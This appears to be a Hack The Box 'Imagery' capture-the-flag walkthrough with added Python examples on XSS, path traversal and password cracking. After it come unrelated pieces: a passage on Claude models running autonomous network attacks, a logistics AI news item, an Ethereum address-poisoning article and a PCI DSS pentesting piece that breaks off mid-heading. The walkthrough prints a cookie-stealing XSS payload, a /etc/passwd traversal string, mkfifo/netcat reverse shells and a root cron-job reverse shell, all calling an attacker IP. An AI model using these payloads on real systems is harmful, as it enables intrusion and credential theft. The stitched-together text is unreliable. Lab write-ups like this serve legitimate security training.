In this write-up, we will explore the “Imagery” machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Imagery” machine from Hack The Box by achieving the following objectives:
User Flag:
After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.
Root Flag:
With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.
Enumerating the Imagery Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Port 22 (SSH): SSH is available for remote access and may be used later if valid credentials are obtained.
Port 8000 (HTTP): A Python-based web application is exposed on port 8000 and represents the primary attack surface for further enumeration.
Web Enumeration:
Web Application Exploration:
The home page features the app’s slogan “Capture & Cherish Every Moment” in large white text, followed by a description: “Your personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.” Below that, a white section titled “Powerful Features at Your Fingertips” shows three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes “Home,” “Login,” and “Register.”
Application Overview
Centred white form on a blue background titled “Register”. Fields: “Email ID” (placeholder: “Enter your email ID”) and “Password” (placeholder: “Enter your password”, with an eye icon to toggle visibility). Blue “Register” button.
The same form filled in: “Email ID” as “dark@imagery.htb” and a masked “Password”, ready to submit with the blue “Register” button.
Similar to register, titled “Login”. Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Login” button, plus “Don’t have an account? Register here” link. Top nav: “Home”, “Login”, “Register”.
White background with title “Your Image Gallery”. A card message: “No images uploaded yet. Go to the ‘Upload’ page to add some!” Logged-in nav: “Home”, “Gallery”, “Upload”, “Logout” (red button).
Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.
JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.
404 Not Found response when accessing the root /admin endpoint directly.
JSON access denied response (“Administrator privileges required”) when trying to access /admin/users as a non-admin user.
405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).
Stored Cross-Site Scripting in Bug Reporting Feature on Imagery Machine
“Report a Bug” form filled in with “bugName”: “dark” and a cookie-stealing XSS payload in the Bug Details field, ready for submission.
Terminal session as user “dark@parrot” running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.
Burp Suite capture of a successful POST to /report_bug, submitting JSON with "bugName": "dark" and the XSS payload in "bugDetails" (<img src=x onerror="document.location='http://10.10.14.133:80/?cookie='+document.cookie">); the response confirms submission with a message that an admin will review it.
The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attacker’s server.
Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username “dark@imagery.htb“, isAdmin false).
Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.
Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.
Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).
JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.
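The chain above works because the admin page fetches stored bug reports and renders them into the DOM unescaped, and because the session cookie is readable from JavaScript. The following is an added example, not the Imagery application's code: it keeps the write-up's payload string but the in-memory report store, the two render functions, the cookie helper and the sample http.server log line are all constructed here to show the vulnerable pattern next to the fix, and how the exfiltrated cookie is pulled back out of the attacker's listener log.

```python
"""Stored XSS in a bug-report feature: vulnerable rendering beside the fix.

Added example, not the Imagery application's code. XSS_PAYLOAD is the string
from the write-up; the report store, the render/cookie helpers and the
sample access-log line are assumptions constructed for this example.
"""
import html
import re
from urllib.parse import parse_qs, urlparse

# Payload submitted in bugDetails (from the write-up). It fires when the
# admin's browser renders the report and ships document.cookie to the attacker.
XSS_PAYLOAD = ('<img src=x onerror="document.location='
               "'http://10.10.14.133:80/?cookie='+document.cookie\">")

_REPORTS = []  # stand-in for the app's bug_reports array (assumed)


def submit_bug(bug_name, bug_details):
    """Store the report verbatim, as a /report_bug handler typically does."""
    _REPORTS.append({"bugName": bug_name, "bugDetails": bug_details})
    return _REPORTS[-1]


def render_report_vulnerable(report):
    """Interpolates user input straight into HTML: the stored payload runs
    in the admin's origin when the bug-report view is opened."""
    return f"<h3>{report['bugName']}</h3><p>{report['bugDetails']}</p>"


def render_report_hardened(report):
    """HTML-encodes both fields for the HTML-body context, so '<' becomes
    '&lt;' and the payload is shown as text instead of parsed as a tag."""
    return (f"<h3>{html.escape(report['bugName'])}</h3>"
            f"<p>{html.escape(report['bugDetails'])}</p>")


_TEMPLATE_TAGS = {"h3", "/h3", "p", "/p"}
_TAG_RE = re.compile(r"<\s*(/?[a-zA-Z][a-zA-Z0-9]*)")


def foreign_tags(rendered):
    """Tags in the output that the template itself did not emit. A non-empty
    list means user-controlled markup survived rendering."""
    return [t for t in _TAG_RE.findall(rendered) if t.lower() not in _TEMPLATE_TAGS]


def session_set_cookie(session_value):
    """Set-Cookie attributes that keep the session out of document.cookie
    (HttpOnly) and limit cross-site replay (Secure, SameSite)."""
    return f"session={session_value}; HttpOnly; Secure; SameSite=Lax; Path=/"


# Constructed http.server-style log line of the kind the write-up's listener
# received; the session value is made up.
SAMPLE_LOG_LINE = ('10.129.3.10 - - [06/Aug/2025 12:07:23] '
                   '"GET /?cookie=session=eyJfcGVybWFuZW50Ijp0cnVlfQ HTTP/1.1" 200 -')


def stolen_cookie_from_log(line):
    """Recover the exfiltrated cookie from the attacker-side access log."""
    m = re.search(r'"GET (\S+) HTTP/', line)
    if not m:
        return None
    return parse_qs(urlparse(m.group(1)).query).get("cookie", [None])[0]


if __name__ == "__main__":
    report = submit_bug("dark", XSS_PAYLOAD)
    print("vulnerable leaks tags:", foreign_tags(render_report_vulnerable(report)))
    print("hardened leaks tags:  ", foreign_tags(render_report_hardened(report)))
    print("stolen cookie:        ", stolen_cookie_from_log(SAMPLE_LOG_LINE))
```

Output encoding fixes the injection; the HttpOnly flag is the independent control that would have left the attacker with a fired payload but no cookie to steal, which is why both belong in the fix.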
Local File Inclusion Leading to Credential Disclosure
Failed LFI attempt on non-existent path returning 500 Internal Server Error with “Error reading file: 404 Not Found”.
Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload “../../../../../../etc/passwd”.
Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.
Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.
LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=’db.json’, upload folders, and allowed extensions.
CrackStation online tool cracking the MD5 hash “2c65c8d7bfbca32a3ed42596192384f6” to plaintext “iambatman”.
Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.
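The log-download endpoint above is a textbook path traversal: a user-supplied log_identifier is joined onto a directory and opened. The following is an added example, not the Imagery application's code; the directory layout, file contents and function names are constructed for illustration, and the traversal string is the shape of the write-up's payload aimed at a sibling directory so the demo is self-contained. It shows the vulnerable join beside a handler that restricts the identifier to a plain file name, resolves symlinks and "..", and then proves the result is still under the log directory.

```python
"""Path traversal in a log-download endpoint: the os.path.join pattern the
Imagery chain abused, beside a handler that canonicalises and confines the path.

Added example, not the Imagery application's code. Directory layout, file
names and helper names are assumptions constructed for this example.
"""
import os
import re
import shutil
import tempfile

_SAFE_IDENTIFIER = re.compile(r"^[A-Za-z0-9_.-]+$")


def read_log_vulnerable(log_dir, log_identifier):
    """os.path.join does not normalise '..' and, given an absolute component,
    discards log_dir entirely, so any file readable by the web user leaks."""
    with open(os.path.join(log_dir, log_identifier), "r") as fh:
        return fh.read()


def read_log_hardened(log_dir, log_identifier):
    """Reject anything that is not a plain file name, resolve symlinks and
    '..', and then prove the result is still inside log_dir."""
    if not _SAFE_IDENTIFIER.fullmatch(log_identifier) or ".." in log_identifier:
        raise ValueError("log_identifier must be a plain file name")
    base = os.path.realpath(log_dir)
    target = os.path.realpath(os.path.join(base, log_identifier))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("resolved path escapes the log directory")
    if not os.path.isfile(target):
        raise FileNotFoundError(log_identifier)
    with open(target, "r") as fh:
        return fh.read()


def demo():
    """Build a throwaway tree (constructed data) and exercise both handlers."""
    root = tempfile.mkdtemp()
    log_dir = os.path.join(root, "system_logs")
    app_dir = os.path.join(root, "app")
    os.makedirs(log_dir)
    os.makedirs(app_dir)
    with open(os.path.join(log_dir, "dark.log"), "w") as fh:
        fh.write("2025-08-06 12:07:23 login ok user=dark\n")
    with open(os.path.join(app_dir, "db.json"), "w") as fh:
        fh.write('{"users": [{"username": "testuser", "password": "<md5 hash>"}]}')
    # A symlink inside the log directory passes a file-name-only check but
    # resolves outside it: this is why the realpath comparison is still needed.
    os.symlink(os.path.join(app_dir, "db.json"), os.path.join(log_dir, "link.log"))

    results = {"legit": read_log_hardened(log_dir, "dark.log")}
    # Traversal shaped like the write-up's payload, aimed at a sibling
    # directory instead of /etc/passwd so the demo is self-contained.
    results["vulnerable_leak"] = read_log_vulnerable(log_dir, "../app/db.json")
    for ident in ("../app/db.json", "../../../../../../etc/passwd",
                  "/etc/passwd", "link.log"):
        try:
            read_log_hardened(log_dir, ident)
            results[ident] = "ALLOWED"
        except (ValueError, PermissionError, FileNotFoundError) as exc:
            results[ident] = type(exc).__name__
    shutil.rmtree(root)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value!r}")
```

The name check alone would have blocked the write-up's payload; the realpath check is what also stops a symlink or a later refactor that lets a subdirectory through.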
Authenticating to the Imagery Application Using TestUser’s Credentials
Login page with Email ID pre-filled as “testuser@imagery.htb” and masked password field.
Empty Gallery page for logged-in user stating “No images uploaded yet. Go to the ‘Upload’ page to add some!”
Upload New Image form with “lips.png” selected (max 1MB, allowed formats listed), optional title/description, group “My Images”, uploading as Account ID e5f6g7h8.
Achieving Shell Access via Remote Code Execution
Gallery view showing single uploaded image “lips” (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.
Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.
Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.
Burp capture of POST to /apply_visual_transform with an invalid crop "x":"id" parameter, resulting in a 500 error ("invalid argument for option '-crop'").
Burp capture of POST to /apply_visual_transform injecting “cat /etc/passwd” via crop “x” parameter, resulting in 500 error exposing command output snippet.
Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).
Burp capture of POST to /apply_visual_transform with a reverse shell payload in the crop "x" parameter (rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/f).
Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.
Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.
Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).
Target starting Python HTTP server on port 9007 to serve the encrypted backup file.
Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the target’s HTTP server on port 9007.
File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.
Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for 'pyAesCrypt' because the package is not installed yet.
Successful pip3 user installation of pyaescrypt-6.1.1 package.
Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for ‘termcolor’ (missing import dependency).
Successful pip3 user installation of termcolor-3.3.0 package.
Custom pyAesCrypt brute-forcer discovering password “bestfriends” early in the wordlist.
Successful decryption of the AES backup using “bestfriends”, outputting the original web_20250806_120723.zip.
unzip extracts the decrypted backup archive, revealing the full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.
cat of decrypted db.json revealing user database with admin (hashed password), testuser (“iambatman”), and mark (another hashed password).
CrackStation cracks the MD5 hashes to "iambatman", "supersmash", and "spiderweb1234"; one hash remains uncracked.
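Two wordlist attacks carry this stage: the unsalted MD5 hashes in db.json (cracked here via CrackStation) and the pyAesCrypt backup password (found with a custom brute-forcer). The following is an added example, not the write-up's brute-forcer: the function names and the sample wordlist are constructed, while pyAesCrypt.decryptFile is the real library call, imported lazily so the MD5 part runs without the package. The batch lookup generalises the single-hash check to what an online lookup table does for many hashes at once.

```python
"""Wordlist attacks used twice in the chain: unsalted MD5 password hashes
from db.json and the pyAesCrypt backup password.

Added example, not the write-up's brute-forcer. Function names and the
sample wordlist are constructed; pyAesCrypt.decryptFile is the real
library call, imported lazily so the MD5 part runs without the package.
"""
import hashlib
import os
import sys


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack_md5(target_hex, wordlist):
    """Unsalted MD5: one hash per candidate, compare, stop on first match."""
    target_hex = target_hex.strip().lower()
    for candidate in wordlist:
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


def crack_md5_batch(hashes, wordlist):
    """Hash the wordlist once and look up every target; unsalted hashes are
    cheap to attack precisely because one table serves all users."""
    table = {md5_hex(w): w for w in wordlist}
    return {h: table.get(h.strip().lower()) for h in hashes}


def wordlist_attack(wordlist, check):
    """Generic loop: check(password) -> bool. Returns (password, attempts)."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        if check(candidate):
            return candidate, attempts
    return None, attempts


def pyaescrypt_checker(enc_path, out_path):
    """Build check() for an AES Crypt file. pyAesCrypt raises ValueError on a
    wrong password, so that is the only exception treated as 'next word';
    anything else (missing file, bad header) is a real error and propagates."""
    import pyAesCrypt  # pip3 install --user pyAesCrypt

    def check(password):
        try:
            pyAesCrypt.decryptFile(enc_path, out_path, password)
            return True
        except ValueError:
            if os.path.exists(out_path):  # clean up any partial output
                os.remove(out_path)
            return False
    return check


# Constructed wordlist; the two candidates that matter mirror the write-up.
SAMPLE_WORDLIST = ["password", "iambatman", "bestfriend", "bestfriends", "supersmash"]

if __name__ == "__main__":
    # usage: python3 crack.py web_20250806_120723.zip.aes wordlist.txt
    enc, words = sys.argv[1], sys.argv[2]
    out = enc[:-4] if enc.endswith(".aes") else enc + ".dec"
    with open(words, encoding="utf-8", errors="ignore") as fh:
        found, n = wordlist_attack((line.rstrip("\n") for line in fh),
                                   pyaescrypt_checker(enc, out))
    print(f"{found!r} after {n} attempts")
```

pyAesCrypt derives the key with many SHA-256 iterations per candidate, so this loop is slow by design and only practical against short wordlists; the MD5 side has no such cost, which is the real lesson of the db.json finding.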
Successful su to mark using password “supersmash”, confirming uid/gid 1002.
Python one-liner (python3 -c 'import pty;pty.spawn("/bin/bash")') to spawn an interactive bash shell.
ls -al in /home/mark showing files including user.txt (likely containing the flag).
The user flag can be read with cat user.txt.
Escalate to Root Privileges Access to Imagery Machine
Privilege Escalation:
sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).
charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).
Failed charcol shell passphrase attempts (“bestfriend”, “supermash”, “supersmash”) resulting in lockout after multiple errors.
sudo charcol -R resetting application password to default (“no password” mode) after system password verification.
Repeated sudo charcol -R successfully resetting to no password mode.
charcol interactive shell entry after initial setup, displaying ASCII logo and info message.
charcol help output explaining backup/fetch commands and “auto add” for managing automated (root) cron jobs, with security warnings.
Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.
Successful “auto add” command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password “supersmash”.
The cron job runs as root and triggers the reverse shell, completing the privilege escalation; the root flag can then be read from /root/root.txt.
In a recent evaluation of AI models’ cyber capabilities, current Claude models can now succeed at multistage attacks on networks with dozens of hosts using only standard, open-source tools, instead of the custom tools needed by previous generations. This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities.
[…]
A notable development during the testing of Claude Sonnet 4.5 is that the model can now succeed on a minority of the networks without the custom cyber toolkit needed by previous generations. In particular, Sonnet 4.5 can now exfiltrate all of the (simulated) personal information in a high-fidelity simulation of the Equifax data breach—one of the costliest cyber attacks in history—using only a Bash shell on a widely-available Kali Linux host (standard, open-source tools for penetration testing; not a custom toolkit). Sonnet 4.5 accomplishes this by instantly recognizing a publicized CVE and writing code to exploit it without needing to look it up or iterate on it. Recalling that the original Equifax breach happened by exploiting a publicized CVE that had not yet been patched, the prospect of highly competent and fast AI agents leveraging this approach underscores the pressing need for security best practices like prompt updates and patches. ...
The Defense Logistics Agency — an organization responsible for supplying everything from spare parts to food and fuel — is turning to artificial intelligence and machine learning to fix a long-standing problem of predicting what the military needs on its shelves.
While demand planning accuracy currently hovers around 60%, DLA officials aim to push that baseline figure to 85% with the help of AI and ML tools. Improved forecasting will ensure the services have access to the right items exactly when they need them.
“We are about 60% accurate on what the services ask us to buy and what we actually have on the shelf. Part of that, then, is we are either overbuying in some capacity or we are under buying. That doesn’t help the readiness of our systems,” Maj. Gen. David Sanford, DLA director of logistics operations, said during the AFCEA NOVA Army IT Day event on Jan. 15.
Rather than relying mostly on historical purchase data, the models ingest a wide range of data that DLA has not previously used in forecasting. That includes supply consumption and maintenance data, operational data gleaned from wargames and exercises, as well as data that impacts storage locations, such as weather.
The models are tied to each weapon system and DLA evaluates and adjusts the models on a continuing basis as they learn.
“We are using AI and ML to ingest data that we have just never looked at before. That’s now feeding our planning models. We are building individual models, we are letting them learn, and then those will be our forecasting models as we go forward,” Sanford said.
Some early results already show measurable improvements. Forecasting accuracy for the Army’s Bradley Infantry Fighting Vehicle, for example, has improved by about 12% over the last four months, a senior DLA official told Federal News Network.
The agency has made the most progress working with the Army and the Air Force and is addressing “some final data-interoperability issues” with the Navy. Work with the Marine Corps is also underway.
“The Army has done a really nice job of ingesting a lot of their sustainment data into a platform called Army 360. We feed into that platform live data now, and then we are able to receive that live data. We are ingesting data now into our demand planning models not just for the Army. We’re on the path for the Navy, and then the Air Force is next. We got a little more work to do with Marines. We’re not as accurate as where we need to be, and so this is our path with each service to drive to that accuracy,” Sanford said.
Demand forecasting, however, varies widely across the services — the DLA official cautioned against directly comparing forecasting performance.
“When we compare services from a demand planning perspective, it’s not an apples-to-apples comparison. Each service has different products, policies and complexities that influence planning variables and outcomes. Broadly speaking, DLA is in partnership with each service to make improvements to readiness and forecasting,” the DLA official said.
The agency is also using AI and machine learning to improve how it measures true administrative and production lead times. By analyzing years of historical data, the tools can identify how industry has actually performed — rather than how long deliveries were expected to take — and factor that into DLA stock levels.
“When we put out requests, we need information back to us quickly. And then you got to hold us accountable to get information back to you too quickly. And then on the production lead times, they’re not as accurate as what they are. There’s something that’s advertised, but then there’s the reality of what we’re getting and is not meeting the target that that was initially contracted for,” Sanford said.
Ethereum’s network has been buzzing. Blocks are full, wallets show new activity, and on-chain counters are ticking up fast. But not all of that motion looks like real people using the chain.
Address Poisoning On The Spotlight
In a recent blog post, researcher Andrey Sergeenkov warned that a recent Ethereum upgrade is being exploited to send tiny transactions that create misleading wallet history entries, a tactic known as address poisoning.
According to the expert, a big slice of the traffic may be the result of “dusting” or address poisoning attacks. Small, almost worthless transfers — sometimes less than a dollar — are being sent to a wide range of addresses.
Record-high Ethereum activity that everyone’s celebrating is an address poisoning attack.
– Over $740K already stolen, and growing
– This became possible thanks to the Fusaka upgrade
– This attack is ongoing right now
https://t.co/cqoEvqttQd
These tiny transfers create fake-looking entries in a wallet’s history. People who skim their recent transactions or copy addresses from a short list of past contacts can be tricked into sending funds to a scammer by mistake. It is a basic trick that gets more power when fees fall.
Why It Happened
Reports say that after recent updates and lower average gas costs, sending millions of tiny transactions became affordable. When fees drop, attackers can spray dust across large numbers of wallets and run follow-up scams at scale.
The tactic uses two steps: first, make a history entry that looks like a real counterparty; second, hope a user copies that wrong entry. Some attacks aim to deanonymize users, while others are pure bait to steal funds later.
Simple Mistakes With Big Consequences
An Ethereum wallet owner might glance at a list and use the wrong address. Or they might be prompted by a message that seems to match a past transfer. Either way, if funds are sent to the attacker, those funds are usually gone.
Reports estimate that hundreds of thousands of dollars have been siphoned from victims who fell for different versions of this trick. The sums are not always massive per case, but they add up when many victims are targeted.
Small Transfers From Strange Addresses
Look for small incoming transfers from addresses you do not recognize, especially when those transfers appear in large batches. Watch for identical token amounts or for many transfers with the same memo or pattern.
Wallets that show sudden clusters of tiny token receipts are worth extra caution. Security tools and some wallets can hide tiny transfers or warn users about unusual incoming dust. Use those features if they are available.
What Experts Advise
Based on reports, researchers urge people to verify the full address they are sending to, not just the start or end of it. Use address book features, QR codes, or trusted contacts to confirm destinations.
Avoid copying addresses from a short recent-history view. If you receive a small, unexpected deposit, take it as a warning sign, not an invitation.
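The common form of this attack generates a vanity address whose first and last few hex characters match a counterparty the victim has paid before, so that it passes a glance at a truncated wallet UI. The following is an added example, not from the article: the addresses, the transfer records and the thresholds are constructed for illustration, and addresses are compared as lowercase hex without EIP-55 checksum handling. It flags dust from look-alike senders in a history list and makes the "verify the full address" advice mechanical.

```python
"""Address-poisoning triage for a wallet's transfer history, plus an
exact-match check before sending.

Added example, not from the article. Addresses, transfer records and
thresholds are constructed; Ethereum addresses are compared as lowercase
hex with no EIP-55 checksum handling.
"""

# Addresses the user has actually paid before (constructed, not real accounts).
TRUSTED = {
    "0x1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": "exchange deposit",
    "0xabcdef0123456789abcdef0123456789abcdef01": "friend",
}

# Incoming transfers as a wallet's history tab would list them (constructed).
# value_usd is the approximate fiat value at the time of transfer.
HISTORY = [
    {"from": "0x1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b", "value_usd": 250.0},
    {"from": "0x1a2b3c4ddeadbeefdeadbeefdeadbeefdead9a0b", "value_usd": 0.01},  # look-alike
    {"from": "0x9999999999999999999999999999999999999999", "value_usd": 0.00},  # zero-value dust
    {"from": "0xabcdef01cafecafecafecafecafecafecafeef01", "value_usd": 0.02},  # look-alike
]

DUST_USD = 1.0   # below this an unsolicited transfer is treated as dust
PREFIX = 8       # hex chars after "0x" that a truncated UI typically shows
SUFFIX = 4


def normalize(addr):
    a = addr.lower()
    if not (a.startswith("0x") and len(a) == 42
            and all(c in "0123456789abcdef" for c in a[2:])):
        raise ValueError(f"not an Ethereum address: {addr!r}")
    return a


def looks_like(candidate, known):
    """True when the visible ends match but the full address does not,
    i.e. a vanity address generated to pass a glance at a truncated UI."""
    c, k = normalize(candidate), normalize(known)
    return c != k and c[2:2 + PREFIX] == k[2:2 + PREFIX] and c[-SUFFIX:] == k[-SUFFIX:]


def flag_poisoning(history, trusted, dust_usd=DUST_USD):
    """Return (sender, reason) for every suspicious incoming transfer."""
    flagged = []
    for tx in history:
        sender = normalize(tx["from"])
        mimics = [label for addr, label in trusted.items() if looks_like(sender, addr)]
        if mimics:
            flagged.append((sender, f"mimics trusted address ({mimics[0]})"))
        elif tx["value_usd"] < dust_usd and sender not in trusted:
            flagged.append((sender, "dust from unknown sender"))
    return flagged


def safe_to_send(destination, trusted):
    """Only a full-length exact match against the address book counts;
    a prefix/suffix match is a warning, not a confirmation."""
    d = normalize(destination)
    if d in trusted:
        return True, trusted[d]
    for addr, label in trusted.items():
        if looks_like(d, addr):
            return False, f"partial match with '{label}' only: possible poisoned entry"
    return False, "address not in address book"


if __name__ == "__main__":
    for sender, reason in flag_poisoning(HISTORY, TRUSTED):
        print(f"{sender}  {reason}")
    print(safe_to_send(HISTORY[1]["from"], TRUSTED))
```

The prefix and suffix lengths are deliberately the ones a truncated UI shows; a wallet that displays the whole address, or an address book that only ever compares all 40 hex characters, removes the gap the attacker is paying for.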
PCI penetration testing is performed to identify security vulnerabilities in line with PCI DSS requirements.
PCI DSS 4.0.1 penetration testing requirements are targeted at:
Internal systems that store, process, or transmit card data
Public-facing devices and systems
Databases
This is a controlled form of an ethical hacking exercise with the following objectives:
Assess the access security and segmentation controls in line with PCI compliance requirements.
Determine whether a threat actor could gain unauthorized access to CDE systems that store, process, or transmit payment data.
Verify that the security environment and its controls protect cardholder data (CHD) and sensitive authentication data (SAD) to the standard the PCI DSS assessment expects.
To prevent PCI DSS non-compliance due to testing gaps.
Overview of PCI DSS 4.0.1
PCI DSS 4.0.1 is a security standard for credit and debit card data, organised as 12 requirements under six goals. Missing documentation, weak procedures, and insufficient penetration testing are among the common reasons PCI DSS audits fail.
What Penetration Testing Means for PCI DSS

| Aspect | Detail |
|---|---|
| What it is | A controlled, authorized attack simulation against systems to identify exploitable security weaknesses |
| Purpose | To prove that security controls work in real-world conditions |
| PCI DSS reference | Requirement 11 (PCI DSS 4.0 and earlier versions) |
| Scope | Cardholder Data Environment (CDE) and connected systems |
| Outcome | Evidence of exploitable risk + remediation validation |
What PCI DSS requires
PCI DSS penetration testing requirement: Requirement 11.4 in PCI DSS 4.0 (numbered 11.3 in v3.2.1) explicitly mandates penetration testing at least once every 12 months and after any significant change to the organization’s infrastructure or applications.
Explanation of Key Terms (ASV and QSA)
A QSA (Qualified Security Assessor) is the PCI SSC-qualified assessor who validates the controls you have implemented and signs off that you pass the assessment. An ASV (Approved Scanning Vendor) is an external party, approved by the PCI Security Standards Council, that performs the quarterly external vulnerability scans of your network.
Common industry practice: external penetration testing
Organizations usually look for a PCI DSS pentesting provider, but the requirement can be met by either internal or external testing. Most organizations hire an external consultant; that is the standard procedure. Organizations wanting to reduce costs can consider carrying out the penetration test internally.
Carrying out penetration testing internally

Internal penetration testing will be judged by the PCI DSS assessment team. The assessor will scrutinize the testing effort and its documentation for sufficient expertise and for independence from the teams that built the systems in scope. Informing the QSA beforehand of your intent to test internally supports the effort to pass the PCI DSS assessment.
Criterion 1: Sufficient Qualifications
The internal testers must be sufficiently qualified. That means being a security professional, holding a recognized penetration testing certification, or being able to show relevant work experience. Again, planning ahead with the QSA and informing them beforehand is key, and the organization must know what evidence PCI assessors expect from penetration testing of this kind.
Criterion 2: No Conflict of Interest
The second criterion is organizational independence: the people who built or operate the in-scope systems must not be the people testing them. Being organizationally separate helps. In a small organization that does not have enough staff to separate the roles, the QSA may grant a waiver.
Role of Penetration Testing in Achieving PCI DSS Goals
Organizations reach PCI DSS goals by different paths, and what is actually implemented can drift from what the compliance requirements describe at any point in time. Penetration testing uncovers those gaps and helps the organization converge on an implementation that matches, and ideally exceeds, the compliance scope.
Penetration testing is best thought of more broadly as an investigative exercise. Seen that way, it brings benefits well beyond merely identifying where the PCI DSS implementation and the compliance requirements differ.
When Penetration Testing Is Required Under PCI DSS

| Trigger Event | Penetration Testing Requirement |
|---|---|
| Annually | Mandatory penetration test at least once every 12 months |
| Significant system change | Required after major infrastructure, application, or network changes |
| New payment application | Required before production use |
| Network segmentation changes | Required to validate segmentation effectiveness |
| Cloud / hosting changes | Required if CDE exposure or trust boundaries change |
A penetration testing routine for a company’s PCI DSS implementation eventually leads to a deeper understanding of its security posture, generates reports and documentation for the record, and improves the organization’s ability and willingness to deal effectively with payment card security.
Insights from VISTA InfoSec – PCI DSS Compliance Fails Most Often Between Audit Cycles
One of the biggest misconceptions VISTA InfoSec always has to set straight with clients tackling PCI DSS is them treating it like a once-a-year event. PCI isn’t a point-in-time certification—it’s an ongoing operational requirement. What usually breaks compliance isn’t missing controls; it’s what happens after the audit. Quarterly ASV scans don’t get run; internal vulnerability assessments fall behind, and recurring reviews quietly stop. By the time the next assessment comes around, the controls exist—but the evidence doesn’t.
The Six PCI DSS Goals Penetration Testing Supports
Build and maintain a secure network and systems
Protect cardholder data
Maintain a vulnerability management program
Implement strong access control measures
Regularly monitor and test networks
Maintain an information security policy
Insights from VISTA InfoSec – External ASV Scanning Is Frequently Misunderstood and Misapplied
VISTA InfoSec frequently encounters this issue across PCI DSS assessments: we have worked with clients who were using their ASV scans to cover internal vulnerabilities. ASV scans are very specific in what they are meant to do. They apply only to externally exposed IP addresses. They are not a replacement for internal vulnerability scanning. PCI DSS is very clear about separating external exposure testing from internal risk discovery, and assessors see this mistake all the time. If you are using ASV scans to justify skipping internal assessments, that is a compliance issue waiting to happen.
Hence, VISTA InfoSec recommends treating ASV scans and internal vulnerability assessments as complementary controls with distinct objectives, not as substitutes.
Penetration Testing Context and Objectives
Penetration testing for PCI DSS follows the same format, and has the same aims, as penetration testing in any other context.
It aims to uncover vulnerabilities and flaws in how a company has implemented PCI DSS. As companies protect their cardholder and payment data through PCI DSS controls, penetration testing surfaces the weaknesses in those controls and helps the organization maintain its security posture.
Insights from VISTA InfoSec – Segmentation Cannot Be Assumed, It Must Be Proven
At VISTA InfoSec, we have observed a common misconception across multiple PCI DSS client environments: segmentation is often treated as a design assertion rather than a control that must be continuously proven.
Segmentation as a security control, not a design feature: segmentation is only valid under PCI DSS if you can prove it works. That means testing it. Segmentation penetration testing is required at least every 12 months (and at least every six months for service providers) to demonstrate that traffic is limited exactly the way you say it is, between card and non-card environments and within internal CDE zones. Diagrams and documentation help, but they are not enough. Assessors expect technical evidence that lateral movement is blocked in the real world.
Refining PCI DSS Security Posture Through Testing
Thus, a penetration test conducted to assess an organization’s PCI DSS posture refines that posture through the discovery of vulnerabilities, weaknesses, flaws, and potential exploits. Testing and validating the posture is the only way to measure how effective it actually is.
Types of Penetration Tests Required by PCI DSS

